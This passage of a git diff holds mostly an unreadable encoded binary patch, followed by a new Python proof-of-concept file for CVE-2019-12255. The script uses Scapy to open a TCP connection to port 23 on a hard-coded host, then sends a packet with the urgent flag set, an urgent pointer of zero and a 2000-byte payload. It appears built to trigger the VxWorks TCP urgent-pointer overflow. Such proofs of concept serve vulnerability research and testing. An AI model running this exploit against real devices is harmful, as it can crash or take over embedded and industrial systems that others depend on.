zd=$c5^wa=${ZMFV3foCv?Db`y910>Fn98&EbkXQ$uruyYwG&ECMB-s-Tx`~zo z<$M5$BMH56m<6JS7=b5SML|=Cq8W@BPGvV%7Az=Ol!eV(V%p9MJurB{-Sb$XoKS$4 zYBhsCvYo+=M1{WxDpjsGk-t0h~rtaB}kfQhB1(Q>!c_hdrZR(8tw-5ZyIWrf6 z1mZBYHPOtb0rE5jM5g~k&rVf>B}L1x5);nH=;eSZ89E{$ljzhhWv}{-{8VWK5*3+` z1Z`-BW(7>r8kb3h!?@~}8E4^sa!k9U;aThcRnwd{kK+hDIq1oB6CdJd=%T&DK>d(R zZOt0H>mH<5OT#D)m}Zb2iwvtg>9=)vV;HQ&!ElRJsKX*L^Sk@&Kz%ugP` z{YB8SIbo>bjwMh$TU!*BMC^z>1Z~XK#cBLR^j@F72lDn|n4Xq_7*^G5)}Ik#-H{>u zxIT7eK4PL@lvdTjcH?g%*6kNHmD9wv{|5}Of zM5{WGWOwgQHOQLLl_eO)wP3Yo;L(zAK4Z=1WG(W|MJ7RLq|0vHurQ z?fJrzSm5+kc(C054oF1V(o!@^`*_MG{g`t2P(T-=j1y{z$wgHhJy9hPx-WE{0!E-Z`H*DONE|OihXA0aEQ$h@`Ve0YF_*@Se2%M1 z0}zgkqL3D4Dd_Di6opI&EJM(W!S|QNVX&&A=#7z)6Rqe1_0%Ve$bvMgZE6Dq)cRCy zB*B=HDa?<+k)u-vyVgaXBhp7mbT~+}(2Z3Tkm*2iMx0$BG8rp{*$zX1F9TFWfnYX- zZqq0Z3Xrs*@;y{YKya@zV40P08)naHc%?5mtM%Jj29>yA< z#WC6w!nzA((NI6tXfIaP<{FX8kA+N{;#%-6?Nr|h|KU??(Dlz%fLw|v zAmg4hv`4X7J0w`NLq607I}nKFf_mNEMSCKhT4{4gabK<^FFFP78mvq0V9L40IKaX}hW zNg4t2rU1#QAa#(w(3B%8MBAapc2#bacdF5otpO@K5ZX|wL1gb3ZmS0~Z7A0he3_w& zZu-bigg{Fw>6h7GrxVc>+-u%h@GhLH8SiWz5DQfEFf%?UwP`?$L zZ2jI`MPBikGu2?K8Orfb%qD4m+%kWBz2TooPCeh%5O`BDN)rlIyD8ilW1*HLTxDbf zMq&xEQaFC7Op2i%h@tUH^T_d#@Q`eIKH@pf1Rl{`Ry-|w4@K40i`5(eyt@h!AOfJX zp_9eK&C$mVT{tP`PB$tTCd(W|4dAmB(g3y$$G4M#20S6K6{SqJPBziTPuGQasY5|e zQ9hf377qjmM2jm!HJq#C?L4g^yDBU?=Lso+&LAKn4WO;Ha50W|ld zfe|XPn{5+4=8PL~l8!FpX|*byYY!eDUI#;5qDw>9@!d%BwkJl%an2^`@C;uWc@HX9lwDIE!q;H9%<6>*>s$q=w2J_;}{D%}QfZlVx= zwrWpAUumly=E3B@g|c`5PkYz@)kJ!)ce(D_Ywf+~?9yJVBD#w%U9SsAsjv}}cyD(v zbuFYebt3|a#oAaXM8uGWd|Pk3doSujubee1klb@TnnE_D8WBhcp{-&S%oGV^fh0ru zHj*J3Oq_&d^5wn*;#utM{sXta%?Zr=zBBXA`+h#p=Xst9qp|j$tL`HbxTy;DA6MIe zy&}YyHX!e8g!V33EqzAh0a=uK>RYW__Z`hU z6JfCOEpW;cSNV!HQ^Z|E1Nx?55eaw|c9?6Xe!EidX9u(Qy3Wm974*iwe5KD5?#@fg z_+8l(^{8s%$mkBpl1wuAQLIpygrL39|H z>im$dNM|G;7;h2&+yZKefNGta4pi45<_0UEsqc9AZD16sk6sa-mKAgS*WvyS;WI(h z{6mttEuWJH_K)`~JGHl~AdY<|(gi;^gYp0~!5%LgLFESsArPN@xEYA&(!@aR%0NMc zl-i~QY5^(d;ZQbw1bM)y8vk%J&Mhr!hGKg_aTLf*0R?o~B+A~|6$NL*8##zU0f-4C zAe^YY-FG~PBz@NwngDxL5zv7%9Ao89{p=Q}WyQj6&c1kF|Q~*h;6IiA+vVavNkYXYks!p&auzVv?ayUltHOF}Cai0nSi+&}U2 z1Uxm{tX|`sU#$E7Q8ozAGiN?qO;&Xk9o5Axk_yl&9QlXGFL>KMTc|JXSfB~dfF!}2 z{v*YY_uzN9aw;sg^CAd@?8fwA$`x+n#xd>{uytg}_u8nDn?zFgFxh`_ zm48W$z6}zH^n3qA zd9yz1Z3lT%PaxXzH*nSxm}y$KGgcD9l=r!*m|T!a%{2aL!a2)f#^ zf{foduT$Qk&Ngs|^b*kyYK-`e1T~3)mOF^xg|f&{$yY$8on|m4IxHoxQjgHMG+lWL z&FAU=16($*`O%B-Py@&Rn6w={&x5`IWxCS)KKZ}~&#^NpA6Om9HTjxz8K|XMI#~5x zYS4U5HK_niJu&_~|NZj8L|TFx7-X87?$Riy!@i@hf-F|F@AfN{L-TH1xcn!ZqD-t; z4&-_otIED2P`U!{<52f|luvTPv&6ZIw){oXQpEcXznqkur2?7e6k78FA7%v!|AHi0 z%FG^0GyF6C>qs_Kj`?s;q&De!u(tXj6F`n)HupZ|cu$hHq%fA>{NJlyoRu5Y_zh65 z{`YqNAfSL2vWt8VgKtqdWzNJuLvH3L{DjKXwce{lKhKcEBZKEjr-0H+*M;~VI! zejX%z`JfjF()|tHk@t3%_jLfVUq53Mxc`C;Z^>ayMHUk7K;;cgw2;_FRu4e=Ds}=e zP)XhYhmOZR?5UfA5sz6B81|<82$QIb$4%4z>f6S#Z`VI`cyf+udMbVrO`47EmJc_~ zB(*S+`(!zyLYqmHf2JsPH4(ov*0~g|_F~}KCbuC150TSYMu$gHE$($9hK@yAz|^m1 zmX+Nu+O2}q%dmeXeOP9JV`>h^x|b52>IR~#0?0hV0@jm;4z~Qwu3(SE!+|=UsxG#{ zs3QQ3BKIBGs;HZR?%mn|61}McV9S9TDzt%L;=dH;Ka-3Dkx&F)PZW&Tf|o%7I*e#O ziBlHWUOLm(%a@JXjvSn-VZJv1RS9^7{~e{90~On&@oMjP?UkEq6HaXWb8P+Y#({0$ zDcUNNe6jswXj{Ew|JF_W<&Y)~-5@F&7P_>=Q<~MAH4~IwuT*RN64{u= zZ{qc_)zkEiMAE1p8Dc*B&sOLsFsfyY>irpT<*){Au>0qf`1$NM_XW{yV0XdD4L^+x zR&B?ICLg5uD;vGdkwY#UzZJusa(2|6%uzGlHnCQsYcev#bXeA)3|XNXD0QWMo5pV` z%W-P#8i`O2m$kBDwp4L0vE6bEGmPsAOQ{3ldJIOEUGIA&dVt|JVN+l(f+b@vEvg|{ z0G9I6OwcGpRyPku)`*`^Ti83IQB1b-Fm<;|9sXG{*nfIWYZveOO!Qp{ z^&XP7F0zPXmKeOjmshCAvjojqI_+J+M1=)2Y3%f77lXU5+NoF zh&SywxZx$H^m*< z3?pXnU1to{c(XyzxkS>#Y$H4m>Jo>S+`#f(mhnSJpYP+5OYao|)c!(1+Ozj7Z_U&yxqjj;V zS7e$Esj}PWO>3vCu0RJ$W~Th$LfrS1adw5b8suIPmvL~{1{C(J8y3gH^c|CmnBH>@{^7(B!>+DYOOy1~dIl>N zQhkAT-5Wk;g^{9%BG>ReS-nV>&k@CJ{u%!T=wQjLMzRHfxJBhrHYOAz(%9<|*};#5|Vq&zBV=jJfQ)dY52tJr1w?71t8H z@c}8Iij;)*LVw)9vdyoGD;NGHL8G|QBsg4UioNv?T5DDrMd!L$R%h_a2s<^#B6H}0 zh=w*J@3L!L8NuvLQwH<`V^q<>3rj_y<463N3%H}hzdN5>GRqF8-GG`2sXZi#Ghk6O zIu!gg8&j)K=S((S3aJgqL3cyw1jwkj%fn`FwCOF&yt@0&z?NvzHYQ$snK_2Eib3Zc zM$T-5`jYX^^l@osHSCo0gNj43K}nvtfF-r1;$4_1c%N2%%!@ykRR=8}$dXQ}Op-hQ zwr$@;O@jP})XblJZ`D<<#8;iSdh0E*7z(Er$r7srn+$JT>~YyAikMtjXKf5`Q@Dd| zvg-sL<&GkUZa_4;zUe9ee&59}yI~y*M&_fM$gk%649I}ISQ)Cz#dhJ1;nOmNh0;XG z@t$Kr3{MupSMg%IEJGDG8(9HNwp(45kKRAflfS@ooq<(AO> zExfz@;cJQjeZ0dzl)g)rA+Ij-z(h4yj}$e7Zt6$$Zlj`4rfO4**NIzu= zZ}tok>di|Fb``l`8=+BIkBNoB!6t9Ua4>As2eI&Z2rTO^4LR)5h^>}ff=bCHsI-!x zEDTLNd_^94a!(---}N=Z_nxe6dVL{p;qA2hYx37F`h{l??0yz&Puxt1nY=ga`~Cpt zQc&fm&3dy;f)69oTUO#Lw_3BVWsezD{n{D1ajW9!~L@}@wa W^J^veR@_Vb-_L)q?cb07=l=m*OOPr6 literal 0 HcmV?d00001 diff --git a/CVE-2019-12255/poc.py b/CVE-2019-12255/poc.py new file mode 100755 index 0000000..ddce30e --- /dev/null +++ b/CVE-2019-12255/poc.py @@ -0,0 +1,19 @@ +from scapy.all import * + +if __name__ == "__main__": + ip = "192.168.10.199" + dport = 23 + seq_num = 1000 + payload = "\x42"*2000 + sport = random.randint(1024,65535) + + syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num) + syn_ack = sr1(syn) + + seq_num = seq_num + 1 + ack_num = syn_ack.seq+1 + ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num) + send(ack) + + psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload + send(psh)